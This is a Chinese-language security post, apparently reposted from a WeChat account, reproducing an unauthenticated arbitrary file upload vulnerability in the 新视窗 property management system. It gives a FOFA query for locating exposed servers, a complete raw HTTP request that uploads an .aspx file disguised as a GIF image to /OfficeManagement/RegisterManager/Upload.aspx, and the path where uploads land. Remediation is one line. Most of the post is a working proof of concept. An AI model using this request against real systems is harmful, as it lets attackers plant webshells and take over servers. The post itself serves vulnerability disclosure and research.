前言
新视窗新一代物业管理系统该系统涵盖了物业管理全流程,包括客户服务、业户管理、报事报修、设施设备管理、财务管理等功能,具有灵活的多组织架构,可以满足不同规模物业公司的需求。
该系统某接口对上传的文件校验逻辑存在缺陷,导致攻击者可以上传webshell文件到服务器,进而可以getshell。
声明:文章中涉及的内容可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
FOFA语法
body="BPMSite/ClientSupport/OCXInstall.aspx"
![[已复现]新视窗新一代物业管理系统任意文件上传漏洞](http://cn-sec.com/wp-content/uploads/2024/04/10-1712749671.png "[已复现]新视窗新一代物业管理系统任意文件上传漏洞")
漏洞复现
直接未授权访问接口进行上传文件
![[已复现]新视窗新一代物业管理系统任意文件上传漏洞](http://cn-sec.com/wp-content/uploads/2024/04/10-1712749672.png "[已复现]新视窗新一代物业管理系统任意文件上传漏洞")
POST /OfficeManagement/RegisterManager/Upload.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Cookie: JSESSIONID=FC2204F3698D2A07CDE9786055A071CB
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 146
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpg
GIF89a
123
--00content0boundary00--
访问路径
/Upload/ContractMamager/71d52920be4d-4956-93f9-77c3b0c899e81.aspx
![[已复现]新视窗新一代物业管理系统任意文件上传漏洞](http://cn-sec.com/wp-content/uploads/2024/04/5-1712749674.png "[已复现]新视窗新一代物业管理系统任意文件上传漏洞")
修复建议
配置WAF针对该URI进行特定数据包内容匹配后拦截
原文始发于微信公众号(pentest):[已复现]新视窗新一代物业管理系统任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论